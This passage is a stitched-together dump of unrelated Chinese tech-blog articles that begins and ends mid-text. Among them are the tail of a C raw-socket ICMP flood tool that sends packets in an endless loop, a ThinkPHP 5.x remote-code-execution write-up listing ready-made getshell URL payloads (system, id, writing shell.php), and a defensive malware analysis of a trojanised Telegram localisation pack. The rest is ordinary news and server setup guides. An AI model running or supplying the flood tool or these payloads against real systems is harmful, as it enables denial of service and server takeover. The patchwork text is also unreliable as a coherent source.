PacketSize=atoi(argv[2]); //取得数据大小 if (PacketSize>65500) { printf("Packet size must less than 65500\n"); //太大会无法生成IP数据报的 exit(0); }    if(argc>3) type=atoi(argv[3]); //取得类型值 if (type>16) { printf("Type must less than 16\n"); exit(0); }    if(argc>4) code=atoi(argv[4]); //取得代码值 //初始化SOCK_RAW if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0) { fprintf(stderr,"WSAStartup failed:%d\n",ErrorCode); exit(0); }   if((SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET) { fprintf(stderr,"WSASocket failed:%d\n",WSAGetLastError()); exit(0); } flag=TRUE; { //设置发送超时 ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut)); if (ErrorCode==SOCKET_ERROR) { fprintf(stderr,"Failed to set send TimeOut:%d\n",WSAGetLastError()); exit(1); } //主要代码开始 printf("Dest:%s   packet:%d   type:%d  code:%d\n\n",argv[1],PacketSize,type,code); printf("Starting...\n\n");   //视觉效果:P memset(&DestAddr,0,sizeof(DestAddr)); DestAddr.sin_family=AF_INET; DestAddr.sin_addr.s_addr=inet_addr(DestIp); //填充Socket结构 //填充ICMP首部 icmp_header.i_type = type; icmp_header.i_code = code; icmp_header.i_cksum = 0; //校验和置0 icmp_header.i_id = 2; icmp_header.timestamp = GetTickCount(); //时间戳 icmp_header.i_seq=999; memcpy(SendBuf, &icmp_header, sizeof(icmp_header)); //组合ICMP报文和头部 memset(SendBuf+sizeof(icmp_header), 'E', PacketSize); //用E填充ICMP数据 icmp_header.i_cksum = checksum((USHORT *)SendBuf,sizeof(icmp_header)+PacketSize); //计算校验和   datasize=sizeof(icmp_header)+PacketSize; //计算整个数据包大小 //开始发送 while(1){ //无限循环,按Ctrl+C跳出 /* 这里的printf实际上是为了延时,Flood程序最好别用这么华丽的界面或字符提示来美化自己,这样会迅速拖慢程序效率!当然,如果能不显示最好,但我去掉printf后,程序死掉了(太快?)如果你觉得“Sending1024 packets...”还是大大增加了延时,可以改成printf("."); 一个小点。反正是自己用,用得顺手就可以。 */ printf("Sending 1024 packets...\n"); for(counter=0;counter<1024;counter++){ //循环发送1024个数据包为一组 //发送ICMP报文 ErrorCode=sendto(SockRaw,SendBuf,datasize,0,(structsockaddr*)&DestAddr,sizeof(DestAddr)); if (ErrorCode==SOCKET_ERROR) printf("\nSendError:%d\n",GetLastError()); } } }    { if (SockRaw != INVALID_SOCKET) closesocket(SockRaw); WSACleanup(); } return 0; } //代码结束 ========================================================= UDP Flood攻击原理与防护 UDP Flood攻击原理 UDP Flood是日渐猖厥的流量型DoS攻击,原理也很简单。常见的情况是利用大量UDP小包冲击DNS服务器或Radius认证服务器、流媒体视频服务器。 100k pps的UDP Flood经常将线路上的骨干设备例如防火墙打瘫,造成整个网段的瘫痪。由于UDP协议是一种无连接的服务,在UDP FLOOD攻击中,攻击者可发送大量伪造源IP地址的小UDP包。但是,由于UDP协议是无连接性的,所以只要开了一个UDP的端口提供相关服务的话,那么就可针对相关的服务进行攻击。 正常应用情况下,UDP包双向流量会基本相等,而且大小和内容都是随机的,变化很大。出现UDP Flood的情况下,针对同一目标IP的UDP包在一侧大量出现,并且内容和大小都比较固定。攻击工具: 53端口的UDP Flood攻击抓图: UDP Flood大包攻击(占带宽,分片): UDP Flood防护 UDP协议与TCP协议不同,是无连接状态的协议,并且UDP应用协议五花八门,差异极大,因此针对UDP Flood的防护非常困难。其防护要根据具体情况对待:   判断包大小,如果是大包攻击则使用防止UDP碎片方法:根据攻击包大小设定包碎片重组大小,通常不小于1500.在极端情况下,可以考虑丢弃所有UDP碎片。   攻击端口为业务端口:根据该业务UDP最大包长设置UDP最大包大小以过滤异常流量。   攻击端口为非业务端口:一个是丢弃所有UDP包,可能会误伤正常业务;一个是建立UDP连接规则,要求所有去往该端口的UDP包,必须首先与TCP端口建立TCP连接。不过这种方法需要很专业的防火墙或其他防护设备支持。 百度云加速提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 #### tcp和udp的区别 TCP和UDP是网络传输协议中最为常用的两种协议,它们在数据传输上有很多区别。本文将详细讨论TCP和UDP的区别。 TCP(Transmission Control Protocol)和UDP(User Datagram Protocol)都是在互联网协议中使用的传输层协议。TCP是一种面向连接的协议,而UDP则是一种无连接的协议。下面将分别介绍它们的特点和区别。 连接方式 TCP是面向连接的协议,需要在通信前建立连接,通信结束时需要断开连接。在连接的过程中,TCP会通过三次握手协议建立连接,以确保连接的可靠性和完整性。而UDP则是无连接的协议,通信前不需要建立连接,通信结束时也不需要断开连接。 可靠性 TCP保证数据传输的可靠性。在数据传输过程中,TCP会采用一系列机制来确保数据的完整性、可靠性和有序性。例如,TCP会通过确认应答机制来检查数据是否已经到达目的地,如果未到达,则会重传该数据。而UDP则没有这些机制,因此数据传输过程中可能会出现丢失、重复、乱序等问题。 速度 UDP的速度比TCP快。因为UDP不需要建立连接,也没有确认应答机制和重传机制等复杂的机制,因此数据传输的速度会更快。而TCP则需要建立连接、确认应答和重传等机制,会降低数据传输的速度。 传输方式 TCP是面向字节流的协议,数据传输时会将数据分割成TCP报文段,每个报文段有序地传输到目的地。而UDP是基于数据报的协议,数据传输时会将数据分割成UDP数据报,每个数据报独立传输到目的地。 适用场景 由于TCP保证数据传输的可靠性,因此适用于需要可靠传输的场景,例如文件传输、电子邮件等。而UDP适用于需要高速传输、数据丢失不会影响传输效果的场景,例如视频、音频等。 综上所述,TCP和UDP的区别主要包括连接方式、可靠性、速度、传输方式和适用场景等方面。在实际应用中,需要根据具体的需求和场景选择适合的传输协议。 #### Telegram汉化很危险,可能藏后门病毒 近期,火绒安全实验室收到用户反馈称自己下载的 Telegram 汉化文件安装后造成系统异常,火绒安全工程师第一时间为用户提供技术支持,提取样本并进行分析。分析过程中发现该程序在对 Telegram 程序进行汉化的同时还 “悄悄” 释放恶意后门文件,执行远控操作,危害极大。目前,火绒安全产品可对上述病毒进行拦截查杀,请广大用户及时更新病毒库以提高防御能力。 火绒 6.0 查杀图 样本执行流程图如下所示: 执行流程图 在此,火绒工程师建议大家在下载软件时,尽量选择官方网站或正规可信的应用商店,同时安装可靠的安全软件保护设备免受恶意软件和病毒的侵害。目前,火绒 6.0 已上线公测,在沿袭核心功能的基础上,专注终端安全,精细化查杀,多重技术深入布局,安全防护再次升级;欢迎大家前往火绒官方网站下载体验。 一、样本分析 起始汉化安装包是一个捆绑了恶意文件的 exe 程序,附带 vmp 壳干扰分析: vmp 加壳 双击运行程序时,其会先执行正常的 telegram 汉化操作,链接到正常 telegram 程序并改变界面语言: 链接到 telegram 汉化 但在执行正常操作的同时,会在内存中解密出第一阶段 payload ,其为一个恶意 dll,用于在内存中加载执行: 内存解密dll Payload1:加载通用.dll 从内存中 dump 出 dll 进行分析,其名称为 "加载通用.dll"。有一个 Hello 的导出函数,但不执行任何操作,所有操作都在 DllMain 中进行: dll 概览 该 dll 以易语言编写并由黑月编译器编译,特征字符串如下: 黑月编译器特征字符串 在执行过程中会先进行一些检测操作,通过判断 SxIn.dll 是否存在来检测 360 的虚拟沙盒。检查 SystemTray_Main 的窗口属性是为了避免重复操作,因为在后面的操作中会有将该窗口属性设置为隐藏的代码: 检测代码 随后开始初始URL部分,计算文件自身 MD5 并获取前 16 字节部分作为URL路径进行拼接,并生成 FPTOKEN 用于后续 http 通讯: 拼接 URL 通信相关的函数是通过 WinHTTP 的 COM 对象接口来调的,数据传输时使用的域名是 http://taobc.tv ,利用前面生成的 URL 路径及FPTOKEN 以验证请求的有效性: 外联操作 接收到的数据为加密数据,如下图所示: 通信流量截图 在接收到回传的通信数据后,dll 会获取多个系统特定位置路径,作为后续投放第二阶段 Payload 使用: 获取系统关键路径 随后通过 ResponseBody 字段来提取加密部分数据,并解密出新的 PE 文件: 调用解密函数 解密数据截图 第二阶段 payload 下发的路径选在 Videos 目录,dll 会创建 VSTELEM 文件夹,并继续创建随机文件夹用以投放第二阶段载荷: payload 投放位置 通过在循环中读取并定位解密数据中的 PE 文件,陆续投放 rzrue.exe(随机文件名,与文件夹同名)、Language.dll、update.dll 到前面指定的目录中: 释放文件代码 文件展示图 其中,如果检测到文件不存在的话,就会连接第二个 C2 进行告知: 发送数据 通信截图 完成前面的文件投放后,dll 还会接着以 SYSTEM_START.lnk 快捷键的方式投放到开机启动目录中实现持久化: 释放 SYSTEM_START.lnk 文件 相关文件属性 随后创建进程,执行下落的 rzrue.exe 文件并等待线程执行,如果进程执行正常,就会更改前面提到的 SystemTray_Main 窗口属性,用以避免重复操作: 创建进程并设置窗口属性 如果 WaitForSingleObject 返回 WAIT_TIMEOUT 超时,同样会连接新的 C2 进行告知: 通信截图 payload2 释放的文件中 rzrue.exe 是白文件,用于加载同目录下的 Language.dll 并调用其中导出函数 LangDLLMain 和 SetRegPath,但实际上并没有 SetRegPath 导出函数,关键操作都在 DllMain 中: 加载 Language.dll 被加载的 Language.dll 同样由 vmp 加密来干扰分析: vmp 加壳 Language.dll 被加载后会读取同目录下的 Update.log,Update.log 是一个加密的字节码文件,其最终会被解密成 dll 并在内存中加载执行: 读取 Update.log 并解密 Update.log 字节码展示 XTFG110.dll 由 Update.log 解密出来的 dll 名为 XTFG110.dll,只有一个导出函数 "Fu*ck"。其中 DllMain 函数主要负责初始化操作,Fu*ck 导出函数主要负责通信操作: DLL 相关信息 XTFG110.dll 同样是易语言编写: 易语言程序入口点 在 DllMain 中,先初始化要连接的 C2 及端口等数据: 初始化 C2 随后在 C:\ProgramData 目录下创建 Lexicon 目录,并在其中创建相关文件夹,猜测是用于后续控制过程中的配置写入以及起到标识操作已完成的作用: 相关文件创建 将执行目录设置为当前路径,方便后续操作: 设置当前路径 接着该 dll 会根据预设的标志执行指定的操作,这些操作包括休眠,文件创建,进程注入等: 可选操作 其中进程注入操作依旧是将 Update.log 解密后(该 dll 自身)写入到其它进程内存中继续执行: 进程注入 最后挂钩键盘事件,监听键盘记录: 监听键盘事件 导出函数执行 导数函数 Fu*ck 是指定执行的,在前面 DllMain 初始化的文件和域名基础上,主要执行通信部分的操作,获取系统信息进行传输并接收 C2 的下一步指令: 函数代码展示 系统信息收集: 在接收数据前,该函数会先收集系统信息进行传输,包括设备名称,频率等: 获取设备信息 并且函数还会检查上一阶段文件存在情况,做好记录: 查看文件 最后函数会收集系统相关注册表及计划任务的存在情况: 收集相关信息 对于收集到的信息,进行整理后会以加密的形式进行发送: 数据加密 传输数据如下图所示: 流量截图 数据接收: 在前面将收集到的系统数据发送后,函数进入新的循环中开始接受 C2 数据。接收数据具体实现如下:第一次获取数据时,其会先定位回传数据的第 7 个字节(从 0 开始算),以此作为新缓冲区的长度进行第二次数据获取: 循环监听 对于接收的所有数据同样需要解密后才能进行操作,解密逻辑同前面加密一样: 解密函数 然后进入数据处理函数中,其中第二次获取数据的第一字节会作为判断值来决定分发情况。根据不同的值,跳转到不同的执行分支中,其中包括系统信息获取、进程注入、下发插件等等,以此实现对受害者主机的完全控制,这里不再一一分析: 可选择的执行分支 二、附录 C&C: HASH: #### TheMoon 恶意软件变种出现,72小时超过6000台华硕路由器被攻击 最近,网络安全公司 Black Lotus Labs 发现了一个名为“TheMoon”的恶意软件僵尸网络变种,它已经感染了全球88个国家和地区的数千台SOHO路由器和物联网设备。在3月初发现该恶意活动后,专家们进行了72小时的追踪,期间发现有6000台华硕路由器成为攻击目标。这些路由器被用来进行各种恶意活动,包括但不限于数据窃取和分布式拒绝服务攻击(DDoS)。 研究人员指出,黑客利用IcedID和SolarMarker等恶意软件,并通过代理僵尸网络来掩盖其在线活动。在这次攻击中,攻击者很可能利用了固件中的已知漏洞,或者通过暴力破解管理员密码、测试默认凭据和弱凭据来攻破路由器。 一旦设备感染了恶意软件,它会检查是否存在特定的shell环境,并加载解密后的有效载荷,该有效载荷会创建一个带有版本号的PID文件。然后,恶意软件会设置iptables规则,阻止特定端口上的TCP流量,同时允许来自特定IP范围的流量,以确保被入侵设备不受外部干扰。此外,恶意软件还会尝试联系合法的NTP服务器列表,以检测沙盒环境并验证互联网连接,最后通过循环使用一组硬编码IP地址与命令和控制(C2)服务器连接,接收指令. #### Thinkbot测试阶段爬虫解析 user-agent: Mozilla/5.0 (compatible; Thinkbot/0.5.8; +In_the_test_phase,_if_the_Thinkbot_brings_you_trouble,_please_block_its_IP_address._Thank_you.) 这是一个名为 Thinkbot 的测试阶段爬虫,版本号为 0.5.8。 关键信息解析 爬虫名称: Thinkbot 版本号: 0.5.8 状态: In_the_test_phase (测试阶段) 开发者声明: 明确说明自己处于测试阶段。 如果该爬虫给您带来麻烦(例如访问过于频繁、消耗过多资源等),开发者直接建议您阻止(Block)其 IP 地址。 结尾礼貌致谢 (Thank_you)。 结论 这不是一个常见的公开爬虫(如 Googlebot, Bingbot, Baiduspider 等)。 这是一个自定义爬虫,很可能属于某个特定的项目、公司或研究者,目前正在进行开发和测试 (v0.5.8 也表明它还不是稳定版本)。 开发者态度透明且主动:他们在 User-Agent 里就坦诚地说明了测试状态,并主动提供了遇到问题时的直接解决方案——封禁 IP。这表明他们意识到测试爬虫可能会对服务器造成意外影响,并希望减少对网站运营者的困扰。 建议处理方式 监控: 在服务器日志中监控这个 Thinkbot 的访问频率和模式。 评估影响: 观察它是否对您的服务器资源(带宽、CPU、内存)或正常用户访问造成显著影响。 按需处理: 如果影响轻微或可接受: 可以暂时观察,毕竟它在测试阶段且开发者态度负责。 如果影响较大或造成问题: 遵循开发者的建议,直接在其 User-Agent 中声明的 IP 地址上实施封禁(Block)。这是开发者明确提出的解决方案,也是最直接有效的方法。 总结 Thinkbot/0.5.8 是一个处于测试阶段的自定义网络爬虫。它的 User-Agent 包含了非常明确的自述信息和遇到问题时的处理建议(封禁 IP)。如果它对您的网站运行没有负面影响,可以观察;如果造成困扰,请毫不犹豫地按照其声明封禁其访问 IP 地址。 #### thinkphp代码执行getshell的漏洞解决 本文来介绍一下thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧 先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell 影响的范围: 5.x < 5.1.31, <= 5.0.23 漏洞危害: 导致系统被提权(你懂的) 这里附上一个自己测试的 thinkphp的 链接  http://www.thinkphp.cn/download/1260.html  版本是5.0.22 先来讲下,5.0 跟5.1的区别吧,tp5.1中引入了容器(Container)和门面(Facade)这两个新的类  tp5.0是没有这两个新的类的, 漏洞原理 URL:http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction 我们先来看看App类里的 exec函数里的执行分层控制器的操作 我们这里是把controller 的调用信息跟配置信息全部传到了 invokeFunction 这个 执行函数里面去了 因为think\App是第二个入口,在tp运行的时候就会被加载 所以用think\App里面的分层控制器的执行操作的时候,需要去调用invokeFunction这个函数。 这个函数有两个参数,如上图所示,第一个是函数的名字,第二个参数数组,比如$function传入BaiDu然后$vars传入[12,555]就相当于调用BaiDu(12,555) 此处我们把function传入call_user_func_array然后vars[0]传入我们要执行的函数的名字vars[1]传入要执行函数的参数,因为vars是个数组 所以此处我们的get请求需要这样写 vars[]=函数名&vars[1][]=参数 此处是利用php的数组注入 此时此刻就可以开始利用远程代码执行漏洞了 比如我们要执行system函数 他的参数是whoami http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 下面你懂的,作为一个接班人我们要做的就是修复他(为所欲为?),当然官方更新的最新版本是已经修复了的 这里就代码执行成功,以下奉献上tp不同版本的payload ?s=index/\think\Request/input&filter=phpinfo&data=1 ?s=index/\think\Request/input&filter=system&data=id ?s=index/\think\template\driver\file/write&cacheFile=shell.php&content= ?s=index/\think\view\driver\Php/display&content= ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id 以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持主机吧。 #### Thinkphp网站程序网站迁移搬家后访问白屏解决办法 目前国内很多源码都使用Thinkphp框架做网站,最近主机吧就帮一个客户搬家,结果文件源码还有数据库文件配置什么的都导入修改了,就是访问失败。 后来主机吧还是在万能的百度上找到了解决办法。 原来是Thinkphp网站是有缓存文件的,需要删除缓存后才可以正常访问。 操作方法很简单,进入源站文件夹把Application/runtime/目录里面的文件全删了就可以了。 删除后主机吧测了下,真的可以了,希望可以帮助大家。 #### thinkphp配置数据库文件是哪一个? 在Conf 文件夹里面的config.php里 <?php return array( 'DB_TYPE' => 'mysql',// 数据库类型 'DB_HOST' => '127.0.0.1',// 数据库服务器地址 'DB_NAME' => 'thinkphp',// 数据库名称 'DB_USER' => 'root',// 数据库用户名 'DB_PWD' => '123',// 数据库密码 'DB_PREFIX' => 'tp_',// 数据表前缀 'DB_CHARSET' => 'utf8',// 网站编码 'DB_PORT' => '3306',// 数据库端口 'APP_DEBUG' => false,// 开启调试模式 ); ?> #### TikTok 服务宕机,海外网友一片痛哭 3 月 10 日消息,今日苹果 App Store 出现服务问题,大量网友无法连接,还登上了微博热搜。 好巧不巧,今日晚间,TikTok 也出现了服务问题,大量网友无法正常访问,发布的视频也消失不见,许多年轻人在推特上表达了伤心与不满。 今日晚间 TikTok 确实出现了大量错误访问,不过在 10 点以后错误量开始减少,官方尚未给出说明。 抖音及海外版 TikTok 都是目前的大热应用,Sensor Tower 发布报告称,2022 年 2 月抖音及海外版 TikTok 在全球 App Store 和 Google Play 吸金超过 2.58 亿美元(约 16.31 亿元人民币),是去年同期的 2 倍。 另据 data.ai(原 App Annie)发布的《2022 年移动市场报告》,除中国大陆外,全球 TikTok 用户平均每月在该应用上花费 19.6 小时,而且中国大陆的抖音使用时长也不容小觑。四年时间里它增长了 4.7 倍(2018 年平均月使用时长 4.2 小时)。 #### TikTok(抖音国际版)印度互联网已无法正常使用 TikTok在印度已经无法继续运行,因为包括Airtel和Vodafone在内的大多数互联网服务提供商似乎已经阻止使用该应用程序。一些位于印度的TikTok用户在Twitter上发布了无法使用该应用的截图。打开TikTok后,人们现在看到的是一条 "无网络连接"的消息,这意味着ISP已经开始阻止访问这个短视频分享平台。 此前,印度政府周一在印度禁止了TikTok和其他 58 款中国应用,这 59 款中国应用将在印度被禁止,原因是 "有损印度主权和完整、国防、国家安全和公共秩序"。这些应用包括TikTok、ShareIt、UC浏览器、Helo、Likee、Xender、CamScanner等大量来自中国厂商开发的应用,有许多都是用户数量众多,影响力巨大的应用,并且印度有许多创意作者依赖于这些平台来发表自己的内容并获取收入。 昨日印度电子信息技术部宣布这一消息时,我们还不清楚政府将如何执行这一禁令,但现在已经明确,电信运营商将阻止这些应用的使用。 与此同时,一些中国应用程序已经从印度的Google Play商店和苹果应用商店中被撤下,也就是说如果你的手机在印度境内下载了这些应用,就很快就会无法使用。 #### TIOBE 8 月编程指数榜:Python 语言受欢迎度再创新高 PHP 排第十三 8 月 5 日消息,TIOBE 编程社区指数是一个衡量编程语言受欢迎程度的指标,评判的依据来自世界范围内的工程师、课程、供应商及搜索引擎,今天 TIOBE 官网公布了 2024 年 8 月的编程语言排行榜,具体如下: Python 排名第一:占比 18.04%,本月上升 4.71% C++ 排行第二:占比 10.04%,本月下跌 0.59% C 排行第三:占比 9.17%,本月下跌 2.24% Java 排行第四:占比 9.16%,本月下跌 1.16% C# 排行第五:占比 6.39%,本月下跌 0.65% TIOBE 的 CEO Paul Jansen 表示,Python 在本月欢迎度首次突破 18%,创下历史纪录,作为比较,目前只有 Java 曾达到过相应 18% 里程碑,不过这已经是 2016 年 11 月的事情了。 排行榜亚军 C++ 现在与 Python 的差距达到 8%,虽然这只是第一名和第二名的区别,不过这反映出 C++ 在很长一段时间内难以超过 Python,并有可能被 C 语言反超。 Paul Jansen 认为,目前 Python 的地位已无可否认,本月的排行榜意味着 Python 正成为有史以来最受欢迎的编程语言,虽然目前我们能够看到 Rust、Kotlin 等竞争者,但这些语言还需要很长时间才能成为 Python 的真正威胁。 #### TK域名成全球第一别国域名 据国外媒体报道称,纽西兰属地、南太平洋岛国托克劳(Tokelau,历史上亦称联合群岛或托克劳群岛)目前仍然是全球所持域名数量最多的国家。数据显示,托克劳所持有的域名数量甚至超过了中国“.cn”域名的 2080 万。日前,英国域名机构发布了全球最新的域名世界地图,并以每个国家为单位对所持有域名数量进行了排序。归功于其实施的免费域名注册政策,托克劳与两年前一样,仍然是全球最大的域名持有国。在 2012 年时,全球“.tk”域名数量还仅为 900 万。而现在,全球“.tk”域名数量已经达到了 2120 万个,领先于中国“.cn”域名。中国“.cn”的域名在过去两年从 1700 万增加到了如今 2080 万,成为了世界上第二个使用最广泛的国家级域名。排在第三位的是德国的“.de”域名,接着则是英国的“.uk”。此外,另一个比较值得一提的域名注册地则是英国海外领土、位于东加勒比海背风群岛北端的安圭拉(Anguilla)。由于全球企业近年来都在大力发展人工智能技术,虽然“.ai”本来只是西印度洋群岛中的某个小国的域名后缀,但安圭拉“.ai”(恰好对应人工智能的英文:ArtificialIntelligence)现在的意义已经变得完全不同,注册数量自去年以来足足增长了219%。甚至有人认为,随着人工智能技术的持续火爆,“.ai”域名甚至有望成为下一个“.com”。比如,谷歌、微软等科技巨头已经确保持有了品牌域名Google.ai、Microsoft.ai。更有不少很多高科技企业开始率先使用“.ai”域名,如:Vernacular.ai和Reality.ai。根据英国非营利域名注册机构Nominet的数据显示,目前全球总计拥有超过1. 532 亿个国家级代码域名,高于 2017 年的1. 436 亿个。不过,作为全球互联网霸主美国的注册域名数量则在过去一年中下降了17 %。同时,自 2017 年以来,非洲域名的数量增长了一倍。朝鲜现在拥有创纪录的 29 个“.kp”域名,其中有五个“.kp”域名都是在去年注册的。在另一方面,占世界石油储量十分之一的中东小国科威特的“.kw”域名也迎来了快速增长。由于此前域名基数较少,这一国家级域名数量在去年一年增长了16080%,新增了 4020 个域名。(腾讯科技编译/汤姆) #### Tomcat9 Java使用免费Https证书加密网站的方法 这篇文章主要介绍了Tomcat9使用免费的Https证书加密网站的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧 1.概述 Apache Tomcat是一款优秀的Java Web容器,对于各个站长来说,可以很方便的使用Tomcat将自己的网站博客放在公网的服务器上,分享自己的心得以及个人博客。 那么在公网中的访问,没有被第三方公认可信的机构加密时,会默认使用Http协议,以明文将自己的网站在公网上传输。这对于大部分领域都没关系,但是对于某些敏感的数据,甚至机密需要保护的数据,例如:银行卡号、银行密码、手机验证码之类的信息,一旦被别有用心的人在中途使用抓包工具拦截,那么将会导致不可设想的后果。 那么网站需要使用SSL(Secure Sockets Layer),顾名思义,安全的套接字层。通过这层提供的保障,在SSL上面运行的应用都可以安全传输。 本文第二部分介绍如果获取免费的证书,第三部分介绍如何用已有的证书在Tomcat中配置,使得Https能够运作,最后一部分介绍,如何在浏览器中输入地址,自动由Http转发到Https上,有需要的读者可以根据需要跳过相应部分。 2.获取证书 对于Https的证书,相当于是在传输过程中加入了第三方的验证机制,简称CA(Certificate Authority),确保传输的安全性。对于大部分证书,签发是需要一定的费用的,本段落主要介绍免费的证书提供方:FreeSSL 官方地址:https://freessl.org/ 具备SSL免费证书申请的前提是,先得有一个域名,没有域名的用户可以先移步阿里云或者腾讯云等域名交易网站购买域名,本例中,我使用自己的已有域名:letcafe.cn作为样例 下面介绍如何获取免费域名Https证书 步骤1、输入你所购买的域名 步骤2、选项默认,如果没特殊需求按步骤填入邮箱后创建: 步骤3、创建完成后,等待几秒后,将会生成一个域名解析DNS的验证环节。对此,需要您去域名供应商网站添加解析,例如,我是用的是阿里云,我在:阿里云->控制台->域名与网站,找到对应的域名添加解析 解析示意图如下: 解析添加完成后,等待将近一分钟,可以回到FreeSSL验证DNS,单击“点击验证”按钮后,将会返回你的CA证书以及公钥 然后点击证书下载,即可获得带有full_chain.pem的文件以及叫private.key的私钥,到此,免费的证书已经申请完毕,下一步将Tomcat的对应内容加入HTTPS 3.配置Tomcat 3.1 生成jks文件 由于Tomcat证书不支持直接使用pem + 私钥的方式,因此,需要多一步使用Openssl将full_chain.pem+private.key转换为jks的步骤,首先将full_chain.pem和private.key上传至服务器的任何目录,我存放的目录是:/root/apache-tomcat-ssl,如下图: 随后使用如下命令,在当前目录下生成一个名为freeSSL.jks的文件,如果使用不了如下命令,尝试考虑升级Openssl到最新版本: 复制代码代码如下: openssl pkcs12 -export -out /root/apache-tomcat-ssl/freeSSL.jks -in ./full_chain.pem -inkey ./private.key 命令过程中会要求输入keystore密码,两次确保一致,并记住该密码,为了演示,我输入的密码为:123456(产品环境下,请确保安全换成其他复杂密码) 3.2 配置server.xml 编辑Tomcat目录下的server.xml文件,文件路径位于:$CATALINA_HOME/conf/server.xml,取决于你的Tomcat安装在何处。 在Connector中,添加如下Connector: 代码附上: 这一步中的keystoreFile填写之前使用Openssl生成的jks文件,keystorePass使用之前输入的密码。 ? 1 2 3 4 5 6 <Connector  protocol="org.apache.coyote.http11.Http11NioProtocol"  port="443" maxThreads="200"  scheme="https" secure="true" SSLEnabled="true"  keystoreFile="/root/apache-tomcat-ssl/freeSSL.jks" keystorePass="123456"  clientAuth="false" sslProtocol="TLS"/> 此外,为了将Tomcat监听80端口,并将HTTPS请求转发到443端口(443为SSL默认端口),还需要将server.xml文件中原有的Connector修改为如下: 将port="8080"改为port="80",redirectPort="8443"改为redirectPort="443" 修改好,保存退出,重启Tomcat,在公网上访问输入地址:letcafe.cn,发现虽然: 通过输入https://letcafe.cn。实现了网站上的小锁显示了 但是输入letcafe.cn后,却失去了Https的加密: 但是,不能用户每次都去手敲HTTPS对不对,此时的Tomcat是会对默认继续使用HTTP,所以如果需要将该域名下的所有访问都走HTTPS加密的话,需要将所有对Tomcat的THHP访问都默认转发给HTTPS的访问,实现不管输入letcafe.cn还是https://letcafe.cn都访问的是HTTPS(如果没有此需求,可不需要下一步) 4.转发Http请求到Https 这一步非常简单,编辑$CATALINA_HOME/conf/web.xml文件,在其中添加如下代码: 代码如下: ? 1 2 3 4 5 6 7 8 9 10 <!-- 增加所有网址自动跳转https -->  <security-constraint>   <web-resource-collection>     <web-resource-name >SSL</web-resource-name>      <url-pattern>/*</url-pattern>     </web-resource-collection>    <user-data-constraint>     <transport-guarantee>CONFIDENTIAL</transport-guarantee>    </user-data-constraint>  </security-constraint> 保存后重启Tomcat,即可完成目标 5.访问测试 在浏览器中输入:letcafe.cn或者https://letcafe.cn或者http://letcafe.cn都可以实现访问定向到https://letcafe.cn中 6.可能会遇到的问题 如果访问不了确认如下问题是否解决: 1.防火墙是否开放端口,CentOS中是firewalld,是否添加了443和80端口 解决方案:添加端口并重载防火墙规则命令如下: ? 1 2 3 firewall-cmd --zone=public --add-port=80/tcp --permanent firewall-cmd --zone=public --add-port=443/tcp --permanent firewall-cmd --reload 查看服务器已对外开放端口命令,确认是否已放通80与443端口: ? 1 firewall-cmd --zone=public --list-ports 2.云服务提供商的拦截规则时候设置开放端口,例如: 阿里云->控制台->云服务器ECS->你的服务器->更多->安全组配置 配置规则中,加入80和443端口的开放,具体配置参照阿里云文档,腾讯云等其他服务商也类似,需要在服务器端先开放云服务商的拦截配置。 配置HTTPS踩了一些坑,希望能分享帮到他人,如有疑问,欢迎留言!   #### TOM邮箱今日停止免费邮箱服务 9月13日消息,根据TOM邮箱发布的公告,因邮箱业务调整,今日起(9月13日)TOM邮箱正式停止免费邮箱服务,9月27日后,邮箱账户将无法登录。 在此期间,用户可登录备份邮件,9月27日后将清除邮箱里的邮件。 之前使用过TOM邮箱免费版的用户尽快进行备份,以免丢失重要电子邮件和附件。 经实测,在官网点击注册免费邮箱页面跳转后,绿色主题界面变为灰白色的免费邮箱页面,该页面提示:暂停办理TOM邮箱注册”。 目前,TOM邮箱提供VIP邮箱、企业邮箱在内的多种付费服务。 老互联网应该都知道,TOM邮箱于1998年3月上线,已运行26年,是由李嘉诚旗下的和记黄埔与长江事业集团联合投资的企业。因为其简短的(@tom.com)邮箱后缀而深受欢迎,主机帮也曾注册过一个tom的免费邮箱,不过由于互联网交流模式的转变,邮箱已经很少人用了,主机帮也一直没用过了,没想到这么多年过去了,邮箱都开始收费了,是不是意味着国内免费邮箱也开始跟进呢? 邮箱的地位其实非常重要,很多时间你非邮箱不可,邮箱有很强的隐私性,非常适合一些商务交流,比腾讯微信、QQ安全多了,当然可玩性肯定没有腾讯全家桶好的。 #### top 域名因钓鱼网站太多 被互联网监管机构 ICANN要求整改 7 月 25 日消息,互联网名称与数字地址分配机构(ICANN)于 7 月 16 日致函 .top 域名注册机构的所有者 [PDF 文件],要求其在 8 月中旬之前给予回复,建立和完善管理网络钓鱼报告和暂停滥用域名的系统,否则将被吊销域名销售许可证。 ICANN 在信函中表示,在最新调查结果中显示“.top”是去年钓鱼网站中最常见的后缀域名之一,仅次于以“.com”结尾的域名。 .top 是由江苏邦宁科技有限公司负责运营管理的一个新通用顶级域名,于 2014 年 11 月 18 日开放注册。 ICANN 在信函中表示:“根据几周来收集到的信息和记录,确定.top 注册机构没有一套流程来及时、全面、合理地调查和处理 DNS 滥用报告”。 网络调查公司 Interisle Consulting Group 于 7 月 23 日发布报告,在 2023 年 5 月至 2024 年 4 月期间共计调查了近 200 万次网络钓鱼,其中 